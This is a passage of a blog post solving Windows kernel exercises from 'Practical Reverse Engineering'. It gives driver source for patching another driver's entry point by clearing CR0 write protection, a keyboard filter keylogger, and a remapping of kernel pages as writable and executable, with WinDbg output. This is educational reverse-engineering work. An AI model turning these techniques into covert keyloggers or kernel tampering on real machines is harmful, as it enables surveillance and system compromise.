unsigned __int64 cr0;
unsigned char patch[] = {0xb8, 0x01, 0x00, 0x00, 0xc0, 0xc3}; // unsigned: 0xb8 and 0xc0 do not fit a signed char
if(!(ImageInfo->SystemModeImage))
{
// ignore usermode images
return;
}
if(FullImageName->Length >= 8*sizeof(WCHAR))
{
drivername = FullImageName->Buffer + (FullImageName->Length/sizeof(WCHAR)) - 8;
if(wcsncmp(drivername, L"\\bda.sys", 8) == 0)
{
DbgPrint("bda.sys driver detected! imagebase %p \n", (UINT8*)ImageInfo->ImageBase);
MZ = (IMAGE_DOS_HEADER *) ImageInfo->ImageBase;
PE = (PIMAGE_NT_HEADERS64) ( ((UINT8*)ImageInfo->ImageBase) + MZ->e_lfanew);
entry_point = PE->OptionalHeader.AddressOfEntryPoint + (UINT8*)ImageInfo->ImageBase;
_disable();
cr0 = __readcr0();
__writecr0(cr0 & 0xfffeffff);
//patch:
// b8 01 00 00 c0 mov eax, 0xc0000001
// c3 ret
memcpy(entry_point , &patch, sizeof(patch));
__writecr0(cr0);
_enable();
}
}
}
VOID MyUnload(__in PDRIVER_OBJECT DriverObject)
{
PsRemoveLoadImageNotifyRoutine(&load_img);
}
NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
DriverObject->DriverUnload = &MyUnload;
PsSetLoadImageNotifyRoutine(&load_img);
return STATUS_SUCCESS;
}
</code></pre>
<br>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The driver installs a load image notify routine via <i>PsSetLoadImageNotifyRoutine</i>. This routine checks whether the name of the loaded image is <i>bda.sys</i> and, if it is, patches its entry point with assembly instructions equivalent to:</span></div>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> return STATUS_UNSUCCESSFUL;
</code></pre>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The load image notify routine is called after the driver is mapped in memory, but before its entry point is executed. Thus, patching the entry point with the code above makes the driver report a load failure, and the OS unloads <i>bda.sys</i> from memory without executing any other code from it. <br>
Finally, when the driver is unloaded, the load image notify callback is removed via <i>PsRemoveLoadImageNotifyRoutine</i>.
</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>6)</b></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">sioctl.h:</span>
<pre class="CICodeFormatter" ><code class="CICodeFormatter"> #include <ntddkbd.h>
typedef struct _DEVICE_EXTENSION
{
PDEVICE_OBJECT pTargetDevice;
} DEVICE_EXTENSION, *PDEVICE_EXTENSION;
</code></pre>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">sioctl.c:</span>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <ntddk.h>
#include <string.h>
#include "sioctl.h"
#define WORD UINT16
#define DWORD UINT32
#define BYTE UINT8
DRIVER_INITIALIZE DriverEntry;
#ifdef ALLOC_PRAGMA
#pragma alloc_text( INIT, DriverEntry )
#endif
PDEVICE_OBJECT kbd_class_dev = NULL;
PDEVICE_OBJECT my_keyboard_dev = NULL;
// scan codes taken from http://www.win.tue.nl/~aeb/linux/kbd/scancodes-10.html (column Set 1)
#define SCAN_MAPPINGS 0x3b
const char *scan_code_mapping[SCAN_MAPPINGS] = {
"<unk>", "<unk>", "1 or !", "2 or @", "3 or #", "4 or $", "5 or %", "6 or ^", "7 or &", "8 or *", "9 or (", "0 or )",
"- or _", "= or +", "Backspace", "Tab", "Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P", "[ or {", "] or }", "Enter", "LCtrl",
"A", "S", "D", "F", "G", "H", "J", "K", "L", "; or :", "' or \"", "` or ~", "LShift", "\\ or |",
"Z","X", "C", "V", "B", "N", "M", ", or <", ". or >", "/ or ?", "RShift", "<unk>", "LAlt", "space", "CapsLock"
};
VOID MyUnload(__in PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unload routine\n");
IoDetachDevice(kbd_class_dev);
IoDeleteDevice(my_keyboard_dev);
}
NTSTATUS io_completion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
{
KEYBOARD_INPUT_DATA *key_buffer;
unsigned long key_number = 0, i;
// read data from the IRP, put it in key
if(Irp->IoStatus.Status == STATUS_SUCCESS)
{
// system buffer may contain an array of KEYBOARD_INPUT_DATA
// The size (in bytes) of the SystemBuffer is stored in Irp->IoStatus.Information
key_buffer = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;
if(Irp->IoStatus.Information != 0)
{
key_number = (unsigned long)(Irp->IoStatus.Information) / sizeof(KEYBOARD_INPUT_DATA);
}
for(i = 0; i < key_number; i++)
{
// only log char in a key release event, not key press
if(key_buffer[i].Flags == KEY_BREAK)
{
if(key_buffer[i].MakeCode < SCAN_MAPPINGS)
{
// translate and log the scan code
DbgPrint("Key scancode: %s \n", scan_code_mapping[ key_buffer[i].MakeCode ]);
}
else
{
DbgPrint("<unk>\n");
}
}
}
}
if(Irp->PendingReturned) IoMarkIrpPending(Irp);
return Irp->IoStatus.Status;
}
NTSTATUS kbd_mj_read(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
IoCopyCurrentIrpStackLocationToNext(Irp);
IoSetCompletionRoutine(Irp, io_completion, NULL, TRUE, TRUE, TRUE);
return IoCallDriver(((PDEVICE_EXTENSION)DeviceObject->DeviceExtension)->pTargetDevice, Irp);
}
NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)
{
NTSTATUS status_code;
UNICODE_STRING kbd_class_name;
PFILE_OBJECT kbd_class_file = NULL;
PDEVICE_EXTENSION device_ext;
int i;
DriverObject->DriverUnload = &MyUnload;
DriverObject->MajorFunction[IRP_MJ_READ] = &kbd_mj_read;
// create a new device
status_code = IoCreateDevice(DriverObject, sizeof(DEVICE_EXTENSION), NULL, FILE_DEVICE_KEYBOARD, 0, FALSE, &my_keyboard_dev);
if(status_code != STATUS_SUCCESS)
{
DbgPrint("Error creating device \n");
return STATUS_UNSUCCESSFUL;
}
// retrieve the keyboard class device
RtlInitUnicodeString(&kbd_class_name, L"\\Device\\KeyboardClass0");
status_code = IoGetDeviceObjectPointer(&kbd_class_name, FILE_READ_ATTRIBUTES, &kbd_class_file, &kbd_class_dev);
if(status_code != STATUS_SUCCESS)
{
DbgPrint("Error getting keyboard class object \n");
return STATUS_UNSUCCESSFUL;
}
// set the device extension for the new device and attach it to class device
RtlZeroMemory(my_keyboard_dev->DeviceExtension, sizeof(DEVICE_EXTENSION));
device_ext = (PDEVICE_EXTENSION)my_keyboard_dev->DeviceExtension;
device_ext->pTargetDevice = IoAttachDeviceToDeviceStack(my_keyboard_dev, kbd_class_dev);
if(device_ext->pTargetDevice == NULL)
{
DbgPrint("Error attaching to keyboard device \n");
return STATUS_UNSUCCESSFUL;
}
// important! Set the correct flags for the new device, especially DO_BUFFERED_IO, or else
// the new device won't have any flag set, and IRP.AssociatedIrp.SystemBuffer will be zero
// causing the system to copy the scancode data to a NULL buffer, which will bsod
my_keyboard_dev->Flags = kbd_class_dev->Flags;
return STATUS_SUCCESS;
}
</code></pre>
<div style="text-align: justify;">
<br>
<span style="font-family: Verdana, sans-serif;">The driver implements a basic keylogger. It attaches its device object to the keyboard device stack and filters the IRPs going to it. In particular, the device object is created via <i>IoCreateDevice</i>, passing <i>FILE_DEVICE_KEYBOARD</i> as the <i>DeviceType</i>, and its <i>DeviceExtension</i> is set to point at the keyboard device stack via <i>IoAttachDeviceToDeviceStack</i>. The keyboard device is obtained via <i>IoGetDeviceObjectPointer</i>, by specifying <i>\\Device\\KeyboardClass0</i> as the <i>ObjectName</i>. The flags of the keyboard class device are copied to the newly created device object, for the reason explained in the source code.<br>
Moreover, the <i>MajorFunction[IRP_MJ_READ]</i> entry (in the driver object) is set to a simple pass-through function, which receives an IRP, copies the current stack location to the next device stack location (via <i>IoCopyCurrentIrpStackLocationToNext</i>), sets a completion routine (via <i>IoSetCompletionRoutine</i>) and calls the lower device's IRP_MJ_READ handler (via <i>IoCallDriver</i>).
The completion routine processes the IRP after the keyboard driver has filled it with the information about the received keystrokes. The driver simply inspects each <i>KEYBOARD_INPUT_DATA</i> structure in the output buffer (stored in IRP.AssociatedIrp.SystemBuffer) and retrieves the keystroke scan codes. </span><span style="font-family: Verdana, sans-serif;">I used standard scan codes to perform a very basic mapping of the keystrokes to the corresponding characters; however, such translation is in general far more complicated than this implementation.<br>
When the driver is unloaded, the device is first detached from the keyboard one (via <i>IoDetachDevice</i>) and then deleted (via <i>IoDeleteDevice</i>).
</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>7)</b></span><br />
<span style="font-family: Verdana, sans-serif;">The first implementation I wrote is the following:</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <ntifs.h>
 #include <string.h>
 #define WORD UINT16
 #define DWORD UINT32
 #define BYTE UINT8

 VOID MyUnload(PDRIVER_OBJECT DriverObject)
 {
     UNREFERENCED_PARAMETER(DriverObject);
     DbgPrint("Unload routine\n");
 }

 // Describes [virtual_address, virtual_address + length) with an MDL, locks the pages
 // and maps them at a second system address, then asks for RWX protection on that mapping.
 // return value: 0 = success, nonzero = error
 int change_protection(BYTE *virtual_address, ULONG length, PMDL *Mdl, PVOID *address)
 {
     *address = NULL;
     *Mdl = IoAllocateMdl(virtual_address, length, FALSE, FALSE, NULL);
     if(*Mdl == NULL)   // the original tested Mdl (the out-pointer) instead of *Mdl
     {
         return 1;
     }
     // MmProbeAndLockPages raises an exception if the pages cannot be locked
     __try
     {
         MmProbeAndLockPages(*Mdl, KernelMode, IoReadAccess);
     }
     __except(EXCEPTION_EXECUTE_HANDLER)
     {
         IoFreeMdl(*Mdl);
         *Mdl = NULL;
         return 4;
     }
     // BaseAddress must be NULL for KernelMode: the kernel chooses the new system address
     *address = MmMapLockedPagesSpecifyCache(*Mdl, KernelMode, MmNonCached, NULL, FALSE, NormalPagePriority);
     if(*address == NULL)
     {
         MmUnlockPages(*Mdl);
         IoFreeMdl(*Mdl);
         *Mdl = NULL;
         return 2;
     }
     DbgPrint("Mapped address: %p \n", *address);
     if(MmProtectMdlSystemAddress(*Mdl, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
     {
         return 3;   // the mapping is still valid: the caller releases it with unmap_mdl
     }
     return 0;
 }

 // Releases what change_protection set up: unmap, unlock, free. Safe to call after a failed call.
 void unmap_mdl(PMDL *Mdl, PVOID *Address)
 {
     if(*Mdl == NULL)
     {
         return;
     }
     if(*Address != NULL)
     {
         MmUnmapLockedPages(*Address, *Mdl);
     }
     MmUnlockPages(*Mdl);   // the original never unlocked the pages locked by MmProbeAndLockPages
     IoFreeMdl(*Mdl);
     *Mdl = NULL;
     *Address = NULL;
 }

 NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)
 {
     BYTE *nonpaged_address;
     int code;
     PMDL pMdl = NULL;
     PVOID new_address = NULL;
     UNREFERENCED_PARAMETER(RegistryPath);
     DriverObject->DriverUnload = MyUnload;
     // taken from monitor.sys (mapped in the range fffff880`0459f000 - fffff880`045ad000)
     nonpaged_address = (BYTE *)0xfffff8800459f000;
     code = change_protection(nonpaged_address, 0x10, &pMdl, &new_address);
     DbgPrint("change protection return value: %d \n", code);
     unmap_mdl(&pMdl, &new_address);
     return STATUS_SUCCESS;
 }
 </code></pre><br>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The driver creates an MDL associated with a virtual address, then probes and locks it and finally maps it to a new virtual address. As an extra, I call the function <i>MmProtectMdlSystemAddress</i> to ensure that the RWX protection is set, but by debugging I have noticed that such protection is already in place after <i>MmMapLockedPagesSpecifyCache</i> (<i>MmBuildMdlForNonPagedPool</i> would normally have been more appropriate, but for the sake of this exercise it can be ignored). After the work is done, the MDL is released by unmapping its pages and deallocating it.</span></div><br>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To verify that the protection is successfully changed, I made a simple test. I used the <i>!pte</i> debugger extension to translate the virtual address of the image base of <i>monitor.sys</i>:</span></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">kd> !pte 0xfffff8800459f000</span><br />
<span style="font-family: Courier New, Courier, monospace;">VA fffff8800459f000</span><br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">PXE at FFFFF6FB7DBEDF88 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF84863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf84 ---DA--KWEV</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">PPE at FFFFF6FB7DBF1000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF83863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf83 ---DA--KWEV</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">PDE at FFFFF6FB7E200110 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 0000000020CEE863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 20cee ---DA--KWEV</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">PTE at FFFFF6FC40022CF8</span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 800000003CDD7963</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3cdd7 <b>-G-DA--KW-V</b></span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<span style="font-family: Verdana, sans-serif; text-align: justify;">(the command output has been edited for better readability)</span><br />
<span style="font-family: Verdana, sans-serif; text-align: justify;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Then, I repeated the test by using the virtual address that I obtained with </span><span style="font-family: Verdana, sans-serif;"><i>MmMapLockedPagesSpecifyCache</i></span><span style="font-family: Verdana, sans-serif;">:</span><br />
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">kd> !pte fffff8800d249000</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">VA fffff8800d249000</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PXE at FFFFF6FB7DBEDF88 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF84863</span><br />
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf84 ---DA--KWEV</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PPE at FFFFF6FB7DBF1000 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF83863</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf83 ---DA--KWEV</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PDE at FFFFF6FB7E200348 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 0000000035879863</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 35879 ---DA--KWEV</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PTE at FFFFF6FC40069248</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 000000003CDD7963</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 3cdd7 <b>-G-DA--KWEV</b></span></div>
</div>
<div>
<br /></div>
</div>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The output shows that the original mapping lacks the executable protection, while the new one has it.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As suggested by the exercise, I tested the same code using the image base address of <i>win32k.sys</i>, which is a session space address, and the system crashed with a BSOD. A quick investigation revealed the problem: the DriverEntry routine is called in the context of the System process, which is not associated with any session. Thus, the session space virtual addresses are not available and cannot be used to build MDLs.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I experimented a bit and found a simple trick to work around this problem: since the System process is not associated with a session, the code should work if it is run from the context of a process that is associated with one. This is a simple modification that makes the driver code work:</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> KAPC_STATE apcstate;
 // taken from fffff960`00060000 fffff960`00370000 win32k
 // session space is mapped only while attached to a process that belongs to that session,
 // so borrow Explorer's address space for the whole lifetime of the MDL
 KeStackAttachProcess((PEPROCESS)0xfffffa8002d7a770, &apcstate); // explorer peprocess
 nonpaged_address = (BYTE *)0xfffff96000060000;
 code = change_protection(nonpaged_address, 0x10, &pMdl, (PVOID *)&new_address); // same signature as above
 DbgPrint("change protection return value: %d \n", code);
 unmap_mdl(&pMdl, (PVOID *)&new_address); // release the mapping before leaving the session context
 KeUnstackDetachProcess(&apcstate);
 </code></pre>
<div style="text-align: justify;">
<div style="text-align: justify;">
<br />
<span style="font-family: Verdana, sans-serif;">I used <i>KeStackAttachProcess</i> in order to get into the context of <i>Explorer.exe</i>, which is associated with the currently logged-in user, but any other process running inside the same login session would have worked (the PEPROCESS is hardcoded just for this test). Debugging this code, I tested the accessibility of the <i>win32k.sys</i> image base address via WinDbg before the driver attached to <i>Explorer</i>:</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">kd> !pte 0xfffff96000060000</span><br />
<span style="font-family: Courier New, Courier, monospace;">VA fffff96000060000</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PXE at FFFFF6FB7DBEDF90 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 0000000000000000</span><br />
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<span style="font-family: Courier New, Courier, monospace;">not valid</span><br />
<div>
<br /></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">kd> db 0xfffff96000060000</span></div>
<span style="font-family: Courier New, Courier, monospace;">fffff960`00060000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????</span><br />
<div>
<br /></div>
<span style="font-family: Verdana, sans-serif;">Translating the virtual address to a physical one fails already at the PXE level (the entry is not valid), and even dumping the bytes from that memory address returns no data. However, as soon as I step beyond <i>KeStackAttachProcess</i> the address becomes available:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">kd> !pte fffff960`00060000</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">VA fffff96000060000</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PXE at FFFFF6FB7DBEDF90 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 00000000184BC863</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">pfn 184bc ---DA--KWEV</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PPE at FFFFF6FB7DBF2C00 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 0000000018ACD863</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 18acd ---DA--KWEV</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PDE at FFFFF6FB7E580000 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 0000000018DCC863</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 18dcc ---DA--KWEV</span></div>
</div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PTE at FFFFF6FCB0000300</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">contains 8030000012588201</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pfn 12588 <b>C------KR-V</b></span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Verdana, sans-serif;">and the driver code works too, creating a mapping with RWX attribute:</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace;">kd> !pte fffff8800e0b4000</span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">VA fffff8800e0b4000</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PXE at FFFFF6FB7DBEDF88 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF84863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf84 ---DA--KWEV</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PPE at FFFFF6FB7DBF1000 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 000000003BF83863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 3bf83 ---DA--KWEV</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PDE at FFFFF6FB7E200380 </span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 0000000030237863</span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 30237 ---DA--KWEV</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">PTE at FFFFF6FC400705A0</span><br />
<span style="font-family: Courier New, Courier, monospace;">contains 0000000012588963</span><br />
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<span style="font-family: Courier New, Courier, monospace;">pfn 12588 -G-DA--<b>KWEV</b></span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;">If I step further down with the debugger, past <i>KeUnstackDetachProcess</i>, the address becomes inaccessible again.</span></div>
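<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an added example (hosted C written for this page, not code from the post or from the exercise), the following program decodes x64 PTE values into the attribute string that <i>!pte</i> prints and extracts the PFN, then checks whether an entry is writable and executable at the same time. The bit positions are Intel's (P, R/W, U/S, A, D, G and NX at bit 63) plus Windows' software copy-on-write bit 9; the relative order of the N and T columns is an assumption, since none of the dumps above sets them. Run on the three PTE values dumped above, it confirms that the two mappings of PFN 3cdd7 differ only in the NX bit, i.e. that the remapping produced a W+X page.</span></div>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bit layout of an x64 hardware PTE (Intel SDM vol. 3) plus Windows' software
 * copy-on-write bit 9, which !pte reports as "C". */
#define PTE_VALID        (1ULL << 0)
#define PTE_WRITE        (1ULL << 1)
#define PTE_USER         (1ULL << 2)
#define PTE_WRITETHROUGH (1ULL << 3)
#define PTE_CACHEDISABLE (1ULL << 4)
#define PTE_ACCESSED     (1ULL << 5)
#define PTE_DIRTY        (1ULL << 6)
#define PTE_LARGEPAGE    (1ULL << 7)
#define PTE_GLOBAL       (1ULL << 8)
#define PTE_COPYONWRITE  (1ULL << 9)   /* Windows software bit, not an Intel flag */
#define PTE_NOEXECUTE    (1ULL << 63)
#define PTE_PFN_MASK     0x000FFFFFFFFFF000ULL  /* physical frame, bits 12..51 */

/* Page frame number of the entry (the "pfn" column of !pte). */
uint64_t pte_pfn(uint64_t pte)
{
    return (pte & PTE_PFN_MASK) >> 12;
}

/* Renders the 11-character attribute string of !pte, e.g. "-G-DA--KWEV".
 * Column order C G L D A N T K/U W/R E V is taken from the WinDbg output on
 * this page; the N (cache disabled) and T (write-through) columns are never
 * set in those dumps, so their relative order is an assumption. */
void pte_flags(uint64_t pte, char out[12])
{
    out[0]  = (pte & PTE_COPYONWRITE)  ? 'C' : '-';
    out[1]  = (pte & PTE_GLOBAL)       ? 'G' : '-';
    out[2]  = (pte & PTE_LARGEPAGE)    ? 'L' : '-';
    out[3]  = (pte & PTE_DIRTY)        ? 'D' : '-';
    out[4]  = (pte & PTE_ACCESSED)     ? 'A' : '-';
    out[5]  = (pte & PTE_CACHEDISABLE) ? 'N' : '-';
    out[6]  = (pte & PTE_WRITETHROUGH) ? 'T' : '-';
    out[7]  = (pte & PTE_USER)         ? 'U' : 'K';
    out[8]  = (pte & PTE_WRITE)        ? 'W' : 'R';
    out[9]  = (pte & PTE_NOEXECUTE)    ? '-' : 'E';
    out[10] = (pte & PTE_VALID)        ? 'V' : '-';
    out[11] = '\0';
}

/* A valid, writable page whose NX bit is clear is writable and executable at
 * the same time: the RWX mapping that MmProtectMdlSystemAddress asked for. */
int pte_is_wx(uint64_t pte)
{
    return (pte & PTE_VALID) && (pte & PTE_WRITE) && !(pte & PTE_NOEXECUTE);
}

/* Two mappings of the same frame share a PFN but may differ in attributes;
 * returns 1 when only the NX bit differs, as in the monitor.sys test above. */
int pte_same_frame_nx_only(uint64_t a, uint64_t b)
{
    return pte_pfn(a) == pte_pfn(b) && ((a ^ b) == PTE_NOEXECUTE);
}

/* PTE values copied from the !pte dumps in this post. */
static const uint64_t kMonitorOriginalPte = 0x800000003CDD7963ULL; /* -G-DA--KW-V */
static const uint64_t kMonitorRemappedPte = 0x000000003CDD7963ULL; /* -G-DA--KWEV */
static const uint64_t kWin32kPte          = 0x8030000012588201ULL; /* C------KR-V */

int main(void)
{
    const uint64_t samples[] = { kMonitorOriginalPte, kMonitorRemappedPte, kWin32kPte };
    for (unsigned i = 0; i < 3; i++) {
        char flags[12];
        pte_flags(samples[i], flags);
        printf("contains %016llX  pfn %llx %s%s\n",
               (unsigned long long)samples[i], (unsigned long long)pte_pfn(samples[i]),
               flags, pte_is_wx(samples[i]) ? "  <-- writable and executable" : "");
    }
    return 0;
}
```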
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<span style="font-family: Verdana, sans-serif;"><b>8)</b></span><br />
<span style="font-family: Verdana, sans-serif;">To figure out which function calls <i>DriverEntry</i>, I wrote a dummy driver, placed a breakpoint on its entry point with <i>DbgBreakPoint()</i> and ran it under kernel debugging so that I could dump the stack.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">driver!DriverEntry+0x3a</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!IopLoadDriver+0xa07</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!IopLoadUnloadDriver+0x55</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!ExpWorkerThread+0x111</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!PspSystemThreadStartup+0x5a</span><br />
<span style="font-family: Courier New, Courier, monospace;">nt!KxStartSystemThread+0x16</span><br />
<div>
<br /></div>
<span style="font-family: Verdana, sans-serif;">The dump shows the functions that were called right before <i>DriverEntry</i>. The function directly responsible for calling the entry point is <i>IopLoadDriver</i>, which is in turn called by <i>IopLoadUnloadDriver</i>. The latter manages both the loading and unloading of a driver (calling the entry point or the driver unload routine respectively), and it runs on a dedicated system worker thread, as shown by the three functions <i>ExpWorkerThread</i>, <i>PspSystemThreadStartup</i> and <i>KxStartSystemThread</i>.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>Solution to some of "The Windows kernel" exercises from Practical Reverse Engineering</b> (giulia, 2014-11-11)</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Recently I spent some time improving my knowledge of the Windows kernel and I had a go at some of the exercises from the "<a href="http://eu.wiley.com/WileyCDA/WileyTitle/productCd-1118787315,subjectCd-CSJ0.html">Practical Reverse Engineering</a>" book. I wanted to share the solutions to the ones proposed on page 180 ("Building Knowledge and Solidifying Your Knowledge" from "The Windows Kernel" chapter), as I think this can be an opportunity to discuss them with other people :) Hopefully I will be able to share more solutions in future blog entries! :)</span><br />
<span style="font-family: Verdana, sans-serif;"><b><br /></b></span>
<span style="font-family: Verdana, sans-serif;"><b>1) </b></span></div>
<div style="text-align: justify;">
</div>
<ul>
